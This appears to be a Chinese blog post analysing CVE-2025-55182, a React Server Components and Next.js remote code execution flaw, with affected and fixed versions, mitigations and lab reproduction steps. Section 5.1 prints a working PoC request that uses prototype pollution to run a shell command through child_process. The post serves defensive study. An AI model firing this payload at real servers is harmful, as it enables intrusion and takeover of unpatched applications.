CVE-2025-55182-POC高危漏洞(React Server Components )技术分析与修复指南(next-router通杀漏洞!)

原创 已于 2025-12-05 18:27:22 修改 · 378 阅读 · 15 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#react.js #CVE-2025-55182 #漏洞复现 #天枢一体化虚拟仿真靶场平台

于 2025-12-05 17:30:27 首次发布

一、漏洞核心信息

项目

详情

漏洞编号

CVE-2025-55182

影响组件

React Server Components(RSC)相关套件、React-Server-DOM、Next.js App Router

漏洞级别

CVSS 10.0 (最高严重级别)

核心成因

React 解析客户端 Flight 协议数据时缺少验证,通过原型污染(Prototype Pollution)伪造 Server Action 调用

利用特点

无需认证、无需依赖 SSRF/CSRF、单请求触发、影响默认配置

漏洞类型

远程代码执行(RCE)、原型污染

、漏洞危害范围

攻击者可通过构造恶意请求实现:

  • 远程执行任意 JavaScript 代码(如反弹 Shell、植入挖矿程序)
  • 控制服务器文件读写(窃取配置文件、源代码、数据库备份)
  • 触发任意数据库操作(删库、篡改数据、窃取用户隐私信息)
  • 接管整个服务器运行时环境(创建管理员账号、横向渗透内网)
  • 典型受影响场景:电商后台、CMS 系统、用户中心、Admin 管理面板等基于 Next.js + RSC 开发的应用

、受影响版本

3.1React 相关套件

  • 受影响版本:React 19.0、19.1、19.2
  • 关联组件:React-Server-DOM、React-Server-DOM-Webpack

3.2Next.js

  • 受影响版本: 15.x系列(15.0.x~15.5.x)16.X 全系列、14.3.0-canary.77及以后的试验版

3.3漏洞触发必要条件

项目需同时满足:

  • 使用React 19或兼容RSC的React-Server-DOM;
  • 使用Next.js(15.x/16.x/受影响Canary)+ App Router + 启用RSC/Server Components。

四、修复方案

4.1、优先级措施

优先级

建议措施

说明

⭐ 必须

升级至安全版本

官方已发布修复,升级是最直接有效的方案

⭐ 推荐

启用Server Action校验机制

仅允许调用已声明的Server Action,阻止任意函数注入

⭐ 建议

为敏感Server Action添加请求验证

如Token、HMAC或用户上下文绑定,增强请求合法性校验

⚠ 可选

限制接口访问边界

通过RBAC、IP限制、网关鉴权等减少攻击面

❌ 不推荐

仅依赖WAF过滤Flight Payload

Flight数据支持压缩、Base64、Chunk编码,WAF难以可靠检测

4.2 已修复版本

组件

安全版本范围

React/React-DOM/React Server DOM

≥ 19.0.1(含19.0.1/19.1.1/19.2.1)

Next.js

≥ 16.0.7

五、POC与复现验证

5.1 原始POC请求

原始POC请求:

POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{"then":"$B1337"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

5.2 复现步骤

步骤1:初始化Next.js项目

使用create-next-app创建项目,并必须选择App Router:

npx create-next-app@14.0.3 normal-rsc-demo
# 选择:Yes(TypeScript)、Yes(ESLint)、Yes(Tailwind)、No(src目录)、Yes(App Router)、No(自定义别名)

步骤2:修改依赖为受影响版本

编辑package.json,将React/Next.js版本调整为受影响范围:

{
  "dependencies": {
    "next": "15.0.4",
    "react": "19.2.0",
    "react-dom": "19.2.0"
  }
}

执行npm install安装依赖。

步骤3:启动开发服务

npm run dev

服务将在http://localhost:3000启动。

步骤4:执行漏洞利用脚本

创建test.sh脚本(示例执行touch /tmp/1):略

平台原因,以下不提供可以直接使用的脚本

步骤5:验证结果

检查/tmp目录是否生成文件1:

ls /tmp
# 输出:1

步骤6:修复依赖

将依赖版本升级至最新

{
  "dependencies": {
    "next": "16.0.7",
    "react": "19.2.1",
    "react-dom": "19.2.1"
  }
}

执行npm install

步骤7:启动开发服务

npm run dev

服务将在http://localhost:3000启动。

步骤8:执行漏洞利用脚本

执行test.sh http://localhost:3000 'touch /tmp/1' 后去tmp目录下可以查看到没有任何文件被创建

六、快速复现验证

      天枢一体化虚拟仿真平台经集成 CVE-2025-55182 漏洞环境,诚邀各位体验测试!

、总结

      CVE-2025-55182是React Server Components的重大安全漏洞,直接威胁使用RSC的Next.js应用。由于其无需认证、单请求触发的特性,攻击者可轻松实现远程命令执行,风险极高。

关键防御建议:

1. 立即升级依赖:将React/Next.js升级至官方修复版本;

2. 启用Server Action校验:限制Server Action的调用范围;

3. 增强请求验证:为敏感操作添加额外的身份或上下文校验;

4. 定期安全审计:关注React/Next.js官方安全公告,及时响应漏洞。

lightningyang
关注
CVE-2025-26466和CVE-2025-26465,这两个漏洞的解决方式除了升级Openssh9.9p2版本外,是否有其他方式解决?
**My Coding Family**
07-14 2359
🏆本文收录于 《全栈Bug调优(实战版)》 专栏,该专栏专注于分享我在真实项目开发中遇到的各类疑难Bug及其深层成因,并系统提供高效、可复现的解决思路和实操方案。无论你是刚入行的新手开发者,还是拥有多年项目经验的资深工程师,本专栏都将为你提供一条系统化、高质量的问题排查优化路径,助力你加速成长,攻克技术壁垒,迈向技术价值最大化职业发展的更高峰🚀!
【网络安全】 CVE-2025-55182React Server Components 远程代码执行漏洞
par@ish的博客
12-04 1423
摘要:React框架及其相关组件(包括Next.js等)曝出高危漏洞CVE-2025-55182,CVSS评分为满分10.0。该漏洞允许未经认证的攻击者通过恶意HTTP请求实现远程代码执行,影响React Server Components的多个版本。约39%的云环境可能受影响,修复补丁已发布(19.0.1/19.1.2/19.2.1)。专家警告该漏洞极易被利用,建议立即升级。临时缓解措施包括限制/server-function端点访问和监控可疑请求。漏洞由安全研究员11月29日报告,12月3日公开披露。
React CVE-2025-55182漏洞排查修复指南
jj1245_的博客
12-04 1030
应对此漏洞,最核心且唯一的根治方法是立即将React核心包及相关框架升级到官方指定的安全版本,并重新构建部署。整个过程应作为最高优先级的安全事件处理。
核弹级漏洞?请看CVE-2025-55182真实测验分析
m0_46699477的博客
12-04 382
网络安全团队针对近期热传的CVE-2025-55182漏洞进行技术分析,指出网传"核弹级漏洞"的说法存在夸大。该漏洞涉及react-server-dom-webpack组件,需要同时满足使用ServerActions功能和不安全的返回值回显两个条件才能触发,实际可利用场景有限。虽然官方已发布补丁修复相关版本,但Goby团队强调该漏洞风险被高估,建议开发者检查代码逻辑并及时升级组件版本,而非过度恐慌。团队将持续跟踪漏洞动态,提供专业安全建议。
React Server Components 远程代码执行漏洞复现验证和修复CVE-2025-55182
lightningyang的博客
12-04 1427
Next.js曝出严重安全漏洞CVE-2025-55182,CVSS评分达10.0。该漏洞存在于Next.js 15.x/16.x及部分测试版本中,允许攻击者通过特制请求实现远程代码执行。漏洞根源是React Server Components中的原型污染问题,攻击者可利用requireModule函数缺陷注入恶意代码。影响范围涵盖使用AppRouter和启用RSC的项目。验证环境显示,漏洞利用无需身份验证且极易触发。建议立即升级至官方修复版本(Next.js 15.0.5/16.0.7等),或实施WAF规
漏洞复现】Vite 任意文件读取漏洞 CVE-2025-30208/CVE-2025-31125/CVE-2025-31486/CVE-2025-32395
仇辉攻防的博客
04-13 2617
Vite 和 Next.js 是两个不同类型的前端工具,它们各自的用途、架构和适用场景有所不同。Vite 是一个现代前端构建工具,主要用于开发和打包前端项目(如 Vue、React 等)。它由 Vue 的作者 Evan You 开发,核心特点是快速启动、按需编译,并且基于 ES 模块(ESM)。Vite 适用于构建前端 SPA(单页应用),并不包含服务端渲染(SSR)或全栈开发能力。
CVE-2025-66478 Next.js 远程代码执行漏洞
大河之犬的博客
12-04 1052
摘要: CVE-2025-66478是Next.js框架(15.x/16.x版本)因依赖存在缺陷的React服务端DOM包导致的高危远程代码执行漏洞(CVSS 10.0)。攻击者通过构造恶意Flight Payload发送至Next.js服务端,利用React对序列化数据验证不严的缺陷,触发反序列化漏洞执行任意代码,无需认证即可实现RCE(文件读写、命令执行等)。目前已有公开PoC,官方建议升级至Next.js 15.0.5+/16.0.7或更新版本修复漏洞
漏洞复现Next.js中间件权限绕过漏洞 CVE-2025-29927
仇辉攻防的博客
03-24 1397
Next.js 是由 Vercel 开发的基于 React 的现代 Web 应用框架,具备前后端一体的开发能力,广泛用于开发 Server-side Rendering (SSR) 和静态站点生成(SSG)项目。Next.js 支持传统的 Node.js 模式和基于边缘计算(Edge Function)的运行模式,适用于轻量、高性能的服务逻辑。首先百度,这是个啥玩意,找到官网,进入看看不用多说了,介绍得贼详细!
CVE-2025-55182 React Server Components 远程代码执行漏洞复现验证和修复
TKXS
12-04 940
Next.js曝出严重安全漏洞CVE-2025-66478,CVSS评分达10.0,攻击者可利用该漏洞通过特制请求实现远程代码执行(RCE)。漏洞影响Next.js 15.x/16.x全系列及部分测试版本,主要涉及使用App RouterReact Server Components的项目。该漏洞源于原型污染问题,攻击者可注入恶意代码污染原型链。验证环境搭建显示,相关依赖存在严重安全风险。建议开发者立即检查项目版本及配置,及时更新修复漏洞,避免生产环境遭受攻击。
漏洞分析 | CVE-2025-29927:Next.js 中间件授权绕过
zkaqlaoniao的博客
05-26 764
Next.js 是由 Vercel 开发的广受欢迎的 React 框架,它凭借无缝集成的服务器端渲染、静态生成和强大的中间件系统,驱动着数百万个 Web 应用程序。然而,在 2025 年 3 月,一个关键漏洞 CVE-2025-29927 震撼了整个生态系统。该漏洞暴露了一个缺陷,使攻击者能够轻易绕过基于中间件的安全控制。该问题由安全研究员 Rachid Allam(又名 zhero)发现,突显了 Next.js 中间件的强大风险。让我们深入探讨该漏洞技术细节、其工作原理以及对开发者的影响。
centos8的openssh9.9p2 RPM包,解决漏洞CVE-2025-26465 和 CVE-2025-26466
03-04
OpenSSH 9.9p2版本是在CentOS 8环境下,针对两个安全漏洞CVE-2025-26465和CVE-2025-26466进行修复的升级版本。CVE-2025-26465漏洞描述为在处理加密过程中的边界条件时可能导致服务崩溃,而CVE-2025-26466则是由于...
VMware紧急修复!VMSA-2025-0010:又现CVE-2025-41225/41226高危漏洞,你的虚拟化还安全吗?
我在Citrix、VMware、Veeam、微软和NVIDIA等领域拥有丰富经验的专业人士,专注于设计和维护虚拟化基础设施、实施备份与灾难恢复策略,致力于优化企业的IT环境。
05-25 1985
VMware紧急修复!VMSA-2025-0010:又现CVE-2025-41225/41226高危漏洞,你的虚拟化还安全吗?
React大模型网站-流式推送markdown转换问题以及开启 rehype-raw,rehype-sanitize,remark-gfm等插件的使用
最新发布
m0_61998604的博客
12-04 701
本文介绍了在React大模型网站中实现流式推送Markdown转换的方法,重点讲解了ReactMarkdown库及其配套插件的使用。主要内容包括:1)ReactMarkdown基础用法;2)通过rehype-raw插件支持HTML标签渲染;3)使用rehype-sanitize防止XSS攻击;4)利用remark-gfm支持GitHub风格的Markdown语法;5)给出了完整的流式渲染实现方案,包含SSE推送、内容累积和实时更新等关键技术。文章还提供了完整的代码示例,帮助开发者快速实现安全可靠的Markd
网络安全漏洞React 框架分析
anquan2233的博客
12-04 760
昨日爆出的 CVE-2025-55182,CVSS 10.0 满分严重漏洞,影响 React 19 及所有 Next.js 15/16 项目。核心问题是 React Server Components 的 Flight 协议存在不安全反序列化,无需任何认证,攻击者只需向 Server Actions 端点发送一个精心构造的 multipart 请求,即可实现远程代码执行(RCE)。目前已确认多个完整 0day 利用链(包括 vm.runInThisContext 在内),未修补实例基本等于已失陷。
React 19 :全栈开发极致性能的新纪元
码农捻旧的博客
12-02 692
React 19带来全栈开发性能优化的重大升级,核心特性包括:1)Actions简化异步状态管理,通过useActionState自动处理表单提交的pending/error状态;2)use Hook突破传统限制,支持条件语句中读取Context和Promise;3)实验性功能如ViewTransition提供声明式UI动画,Activity优化组件渲染性能。升级建议逐步采用新特性,重点关注Actions重构表单逻辑和use Hook简化异步处理。
Vue 响应式原理深度解析:Vue2 vs Vue3 核心差异 + ref/reactive 实战指南
qq_40303030的博客
12-03 1099
本文深入剖析Vue响应式系统原理,对比Vue2Vue3实现差异。Vue2基于Object.defineProperty存在无法监听新增属性、数组操作受限等痛点;Vue3采用Proxy方案实现全面升级,支持对象/数组所有操作并提升性能。详细讲解了refreactive的使用场景区别,提供toRefs等实用工具的使用指南,总结常见开发陷阱及解决方案。通过核心原理分析+实战示例,帮助开发者深入理解Vue响应式的设计思想,掌握最佳实践方案。
Lyra学习5:GameFeatureAction分析
chenchaoNH的博客
12-02 647
GameFeatureAction.h GameFeatureAction.cpp 以下是该类所有成员的分析,包括其作用和在 LyraStarterGame 项目中的典型应用:在 LyraStarterGame 项目中:
修复CVE-2025-6018和CVE-2025-6019漏洞
08-07
CVE-2025-6018 和 CVE-2025-6019 是两个特定于某些软件或服务的安全漏洞。尽管没有直接提及这两个漏洞的详细信息,但可以根据常见的漏洞修复方法提供指导。修复此类安全漏洞通常涉及以下几个方面:代码审查、输入验证、权限控制以及及时更新依赖库或框架。 ### 代码审查输入验证 在开发过程中,定期进行代码审查是发现潜在安全问题的重要手段。特别是对于涉及到用户输入的部分,应确保所有输入都经过严格的验证和清理。例如,对于Web应用程序中的表单提交,可以使用正则表达式来限制输入的格式,防止恶意代码的注入[^1]。 ```python import re def validate_input(input_string): # 使用正则表达式限制输入为字母数字字符 if re.match("^[a-zA-Z0-9_]+$", input_string): return True else: return False ``` ### 权限控制 确保应用程序遵循最小权限原则,即每个组件或用户仅拥有完成其任务所需的最小权限。这可以通过配置文件或代码中的权限检查来实现。例如,在一个基于角色的访问控制系统中,可以定义不同的角色及其权限,并在执行敏感操作前进行权限检查[^1]。 ```python def check_permission(user_role, required_permission): # 假设有一个权限映射表 permissions = { 'admin': ['read', 'write', 'delete'], 'user': ['read'] } # 检查用户角色是否存在且具有所需权限 if user_role in permissions and required_permission in permissions[user_role]: return True else: return False ``` ### 更新依赖库或框架 保持所有依赖库和框架的最新版本是防止已知漏洞的关键。许多开源项目会定期发布安全更新,以修复发现的问题。开发者应该订阅这些项目的更新通知,并及时将更新应用到自己的项目中。此外,使用自动化工具可以帮助跟踪和更新依赖项。 ```bash # 使用npm更新所有依赖项 npm update ``` ### 安全测试 实施全面的安全测试策略,包括但不限于单元测试、集成测试和渗透测试。这些测试可以帮助识别和修复潜在的安全漏洞。例如,使用OWASP ZAP等工具进行自动化安全测试,可以发现诸如SQL注入、XSS攻击等常见问题[^1]。 ### 安全意识培训 最后,提高团队的安全意识也是不可或缺的一环。定期组织安全培训,让开发人员了解最新的安全威胁和最佳实践,从而在开发过程中自觉地遵循安全编码规范。 通过上述措施,可以有效地减少和预防包括CVE-2025-6018 和 CVE-2025-6019在内的多种安全漏洞的发生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值